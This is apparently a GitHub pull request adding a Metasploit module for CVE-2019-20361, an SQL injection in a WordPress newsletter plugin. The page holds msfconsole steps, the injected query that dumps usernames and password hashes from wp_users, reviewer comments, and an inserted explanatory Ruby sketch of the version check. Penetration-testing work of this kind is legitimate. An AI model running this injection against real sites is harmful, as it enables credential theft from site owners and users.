
Wordpress plugin: Email Subscribers & Newsletters sqli (CVE-2019-20361) #14418

Merged (6 commits) Dec 9, 2020

Conversation

h00die (Contributor) commented Nov 21, 2020

This PR adds a module and docs for CVE-2019-20361, a time-based SQLi in the WordPress plugin Email Subscribers & Newsletters < 4.3.1.

Verification

  • Install the plugin on wordpress.
  • Start msfconsole
  • Do: use auxiliary/scanner/http/wp_email_sub_news_sqli
  • Do: set rhosts [ip]
  • Do: set action [action]
  • Do: run
msf6 > use auxiliary/scanner/http/wp_email_sub_news_sqli 
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set count 3
count => 3
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run
[*] Checking /wp-content/plugins/email-subscribers/readme.txt
[*] Found version 4.2.2 in the plugin
[+] Vulnerable version detected
[*] {SQLi} Executing (select group_concat(yKaoA) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) yKaoA from wp_users limit 3) adO)
[*] {SQLi} Time-based injection: expecting output of length 124
[+] wp_users
========
 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
 admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
 editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

end

checkcode = check_plugin_version_from_readme('email-subscribers', '4.3.1')
if checkcode == Msf::Exploit::CheckCode::Safe
Contributor

It looks like the logic from check_plugin_version_from_readme can also return Appears, Detected and Unknown under some conditions. Continuing on Vulnerable, Appears and Detected, like the AutoCheck mixin does, would be a bit more robust here.
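To make the reviewer's point concrete, here is a stand-alone sketch of the readme.txt version check and the "continue on which codes" decision. It is an added example, not the module's code or Metasploit's own `check_plugin_version_from_readme`: it parses the `Stable tag:` line that WordPress plugin readme.txt files carry (that format is assumed from the WordPress plugin readme convention), compares it against the fixed version 4.3.1 named in the PR, and returns a symbol standing in for the Msf::Exploit::CheckCode values. The `CHECK_CODES`, `CONTINUE_ON` constants and the sample readme bodies are constructed here for illustration.

```ruby
require 'rubygems' # for Gem::Version (loaded by default on modern Ruby; explicit for clarity)

# First version of Email Subscribers & Newsletters not affected by CVE-2019-20361 (from the PR).
FIXED_VERSION = '4.3.1'

# Stand-ins for Msf::Exploit::CheckCode (constructed; the real ones are objects in Metasploit).
CHECK_CODES = %i[vulnerable appears detected safe unknown].freeze

# Codes on which a scan should proceed, mirroring the reviewer's suggestion to
# behave like the AutoCheck mixin rather than only stopping on Safe.
CONTINUE_ON = %i[vulnerable appears detected].freeze

# Extract the version from a WordPress plugin readme.txt body.
# Returns nil when there is no numeric Stable tag (e.g. "Stable tag: trunk").
def stable_tag(readme_body)
  m = readme_body.match(/^\s*Stable tag:\s*(\d+(?:\.\d+)*)\s*$/i)
  m && m[1]
end

# Classify a readme body against the fixed version.
#   :unknown    - nothing to parse (no readme returned)
#   :detected   - plugin readme present but version not readable
#   :vulnerable - version strictly below the fixed version
#   :safe       - fixed version or newer
def check_plugin_readme(readme_body, fixed_version = FIXED_VERSION)
  return :unknown if readme_body.nil? || readme_body.strip.empty?

  version = stable_tag(readme_body)
  return :detected if version.nil?

  # Gem::Version compares numerically per component, so "4.10" > "4.3.1";
  # a plain string comparison would get that wrong.
  Gem::Version.new(version) < Gem::Version.new(fixed_version) ? :vulnerable : :safe
end

# The decision the review thread is about: keep going on more than just Vulnerable.
def continue_scan?(code)
  CONTINUE_ON.include?(code)
end

# Constructed sample readme bodies (not captured from a real site).
SAMPLE_VULNERABLE_README = <<~README
  === Email Subscribers & Newsletters ===
  Requires at least: 3.9
  Stable tag: 4.2.2
README
SAMPLE_FIXED_README = "=== Email Subscribers & Newsletters ===\nStable tag: 4.3.1\n"
SAMPLE_TRUNK_README = "=== Email Subscribers & Newsletters ===\nStable tag: trunk\n"

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_VULNERABLE_README, SAMPLE_FIXED_README, SAMPLE_TRUNK_README, ''].each do |body|
    code = check_plugin_readme(body)
    puts "#{code.inspect} (continue? #{continue_scan?(code)}) for Stable tag #{stable_tag(body).inspect}"
  end
end
```

The `:detected` branch is the case the reviewer is pointing at: a readme that exists but carries `Stable tag: trunk` is evidence the plugin is installed, and a scan that only checks `== Safe` would treat it the same as a confirmed vulnerable version, while a scan that only continues on `Vulnerable` would silently skip it.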

print_good('Vulnerable version detected')

guid = Rex::Text.rand_guid
email = "#{Rex::Text.rand_text_alpha(8)}@#{Rex::Text.rand_text_alpha(8)}.com"
Contributor

So it turns out Rex::Text actually has a built-in method for this: Rex::Text.rand_mail_address.

@smcintyre-r7 smcintyre-r7 self-assigned this Dec 7, 2020
h00die (Contributor, Author) commented Dec 7, 2020

looks good, retested and working!

smcintyre-r7 (Contributor)

Works as intended, I'll get this landed. Tested with COUNT above and below the actual number of users.

Testing Output
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set RHOSTS 192.168.159.31
RHOSTS => 192.168.159.31
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > show options 

Module options (auxiliary/scanner/http/wp_email_sub_news_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      1                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.31   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users


msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set COUNT 5
COUNT => 5
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run

[+] Vulnerable version detected

[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 aliddle     [redacted]                        
 smcintyre   [redacted]                        
 user        [redacted]                        

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > 
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set COUNT 1
COUNT => 1
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run

[+] Vulnerable version detected
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 user        [redacted]                        

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > creds 
Credentials
===========

host            origin          service        public     private                             realm  private_type        JtR Format
----            ------          -------        ------     -------                             -----  ------------        ----------
                192.168.159.31                 user       [redacted]                                 Nonreplayable hash  phpass
                192.168.159.31                 smcintyre  [redacted]                                 Nonreplayable hash  phpass
                192.168.159.31                 aliddle    [redacted]                                 Nonreplayable hash  phpass

@smcintyre-r7 smcintyre-r7 merged commit 59339f3 into rapid7:master Dec 9, 2020
smcintyre-r7 (Contributor) commented Dec 9, 2020

Release Notes

New module auxiliary/scanner/http/wp_email_sub_news_sqli adds an exploit for CVE-2019-20361, which is a SQLi in the Email Subscribers & Newsletters WordPress plugin. The vulnerability can be leveraged to leak usernames and their password hashes.

@h00die h00die deleted the emailsubsqli branch December 9, 2020 19:57
@h00die h00die changed the title Wordpress plugin Email Subscribers & Newsletters sqli (CVE-2019-20361) Wordpress plugin: Email Subscribers & Newsletters sqli (CVE-2019-20361) Jan 2, 2021
@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 21, 2021
hackercoolmagz

While I am executing this module, I am getting this error. Can anybody tell what is wrong?

msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > exploit

[*] Checking /wordpress5.4/wp-content/plugins/email-subscribers/readme.txt
[*] Found version 4.2.2 in the plugin
[+] Vulnerable version detected
[-] payload-failed: 192.168.36.148:80 - Testing of SQLi failed. If this is time based, try increasing SqliDelay.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hackercoolmagz

I tried increasing the SqliDelay to 10, but the error persists.

h00die (Contributor, Author) commented Feb 5, 2021

What db?

Labels
docs module rn-modules release notes for new or majorly enhanced modules
5 participants